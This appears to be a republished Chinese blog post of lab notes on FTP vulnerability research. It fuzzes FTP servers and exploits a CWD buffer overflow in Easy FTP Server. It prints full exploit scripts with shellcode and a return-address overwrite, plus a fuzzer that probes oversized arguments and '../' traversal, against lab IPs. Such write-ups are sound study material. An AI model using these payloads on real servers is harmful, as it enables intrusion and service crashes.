FTP的漏洞挖掘
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了FTP的漏洞挖掘相关的知识,希望对你有一定的参考价值。
FTP协议简介
漏洞挖掘手记1:DOS
原理是对FTP协议中的命令及命令参数进行脏数据替换,构造畸形FTP命令并发送给被测试FTP服务程序。
下了一个FTPFuzz,界面丑绝人寰
开启Quick ‘n Easy FTP Server
开启后,做实验并没有崩溃,不能触发DOS攻击。可能和SP3有关
漏洞挖掘手记2:访问权限
在WIN7中开启CompleteFTP Server
登陆不了,新建个账户吧
FTP 目录在本地系统中的“/Home/user”
所以这这就绕过了?
easyFTP 缓冲区溢出漏洞
Easy FTP Server执行CWD时未对参数进行长度有效性校验,传递超长参数会造成缓冲区溢出.
启动easyFTP,开启后生成三个XML配置文件和一个文件夹
挂连上OD,按F9继续运行
实验失败:
代码如下:
import socket import sys def ftp_test(ip,port): target = ip port = port shellcode = (‘\\x50\\x20‘ ‘\\xD9\\xEE‘ ‘\\xD9\\x74\\x24\\xF4‘ ‘\\x58‘ ‘\\x83\\xC0\\x1b‘ ‘\\x33\\xC9‘ ‘\\x8A\\x1C\\x08‘ ‘\\x80\\xF3\\x11‘ ‘\\x88\\x1C\\x08‘ ‘\\x41‘ ‘\\x80\\xFB\\x90‘ ‘\\x75\\xF1‘ ‘\\xed\\x79\\x7b\\x1b\\x29\\x0f\\x79\\x72\\x98\\xc0\\x5e\\x79\\x23\\x65\\x80\\x1d‘ ‘\\x9a\\xe5\\x9c\\x6f\\xe5\\x22\\xca\\xa6\\x15\\x3a\\xf2\\x77\\xaa\\x22\\x23\\x42‘ ‘\\x79\\x64\\x62\\x74\\x63\\x45\\x22\\xc3\\x75\\x9a\\x4b\\x21\\x9a\\x5a\\x1d\\x9a‘ ‘\\x58\\x0d\\x9a\\x18\\x9a\\x78\\x19\\xbc\\x2c\\x7b\\x1b\\x29\\x0f\\x64\\x14\\x84‘ ‘\\xee\\x46\\xe9\\x84\\x71\\x9a\\x54\\x2d\\x9a\\x5d\\x14\\x69\\x12\\xdc\\x9a\\x48‘ ‘\\x31\\x12\\xcc\\x22\\xee\\x56\\x9a\\x25\\xaa\\x12\\xe4\\x88\\x1e\\xaf\\x17\\x2b‘ ‘\\xd5\\x65\\x19\\xd0\\xdb\\x16\\x12\\xc1\\x57\\xfa\\xe0\\x2a\\x45\\x35\\x0d\\x64‘ ‘\\xf5\\x9a\\x48\\x35\\x12\\xcc\\x77\\x9a\\x2d\\x6a\\x9a\\x48\\x0d\\x12\\xcc\\x12‘ ‘\\x3d\\xaa\\x84\\x4e\\xba\\x46\\x70\\x2c\\x7b\\x1b\\x29\\x0f\\x64\\xb8\\x22\\xca‘ ‘\\x42\\x79\\x75\\x70\\x21\\x32\\x79\\x32\\x41\\x70\\x7f\\x9a\\xd5\\x42\\x41\\x41‘ ‘\\x42\\xee\\x46\\xed\\x42\\xee\\x46\\xe9\\x81‘) buffer = shellcode+‘a‘*(268-198)+‘\\xa0\\x6f\\x5f\\x7d‘ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target,port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) s.send(‘USER anonymouss\\r\\n‘) s.recv(1024) s.send(‘PASS anonymous\\r\\n‘) s.recv(1024) print "[+] Sending buffer..." s.send(‘CWD‘ + buffer + ‘\\r\\n‘) try: s.recv(1024) print "failed" except: print "ok" s.close() if __name__ == ‘__main__‘: ftp_test("192.168.211.129", 21)
转去网上搜索别人的代码,他人代码用到的是 pwntools 包,在windows上安装不了,我笑了。呵呵哒。此处贴上他人利用的代码
from pwn import * p = remote("192.168.253.156", 21) jmp_esp = 0x7E429353 shellcode = "\\x33\\xDB\\x53\\x68\\x6E\\x63\\x68\\x21\\x68\\x74\\x62\\x72\\x61\\x68\\x67\\x69\\x61\\x6E\\x8B\\xC4\\x53\\x50\\x50\\x53\\xB8\\xEA\\x07\\x45\\x7E\\xFF\\xD0" nop = "\\x90" * 12 payload = ‘a‘ * 268 + p32(jmp_esp) + nop + shellcode print p.recv(1024) p.sendline("USER anonymous") print p.recv(1024) p.sendline("PASS anonymous") print p.recv(1024) p.sendline("CWD " + payload) p.interactive()
Fuzz DIY
# -*- coding: utf-8 -*- # @Date : 2017-02-19 21:44:12 # @Author : giantbranch ([email protected]) # @Link : http://blog.csdn.net/u012763794?viewmode=contents # @Link : http://www.giantbranch.cn/ import sys import socket buffer = ‘a‘ * 4 fuzzcmd = [‘mdelete‘, ‘cd‘, ‘mkdir‘, ‘delete‘, ‘cwd‘, ‘mdir‘, ‘mput‘, ‘mls‘, ‘rename‘, ‘site index‘ ] if len(sys.argv) != 4: print "[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1" sys.exit(0) target = sys.argv[1] port = int(sys.argv[2]) mode = int(sys.argv[3]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print target print port con = s.connect((target, port)) print "[*] Connected!" except: print "[*] Connect failed!" sys.exit(0) # 接受欢迎信息 s.recv(1024) s.send("USER anonymous\\r\\n") s.recv(1024) s.send("PASS anonymous\\r\\n") s.recv(1024) j = 100 if mode ==1: print "[*] Sending payload..." for i in fuzzcmd: s.send(i + ‘ ‘ + buffer*j + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer*j*4 + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer*j*8 + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer*j*40 + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer + ‘ ‘ + buffer + ‘\\r\\n‘) try: s.recv(1024) print "[!] WuWu, Failed!" except : print "[+] Yeah! Maybe you find a Bug!" if mode == 2: s.send(‘cd ../\\r\\n‘) ds = s.recv(50).find("550") if ds != -1: print "[+] Yeah! Maybe you can cd ../!" if mode == 2: s.send(‘cd ..\\\\r\\n‘) dss = s.recv(50).find("550") if dss != -1: print "[+] Yeah! Maybe you can cd ..\\!"
运行完毕,服务端特别卡
未成功
以上是关于FTP的漏洞挖掘的主要内容,如果未能解决你的问题,请参考以下文章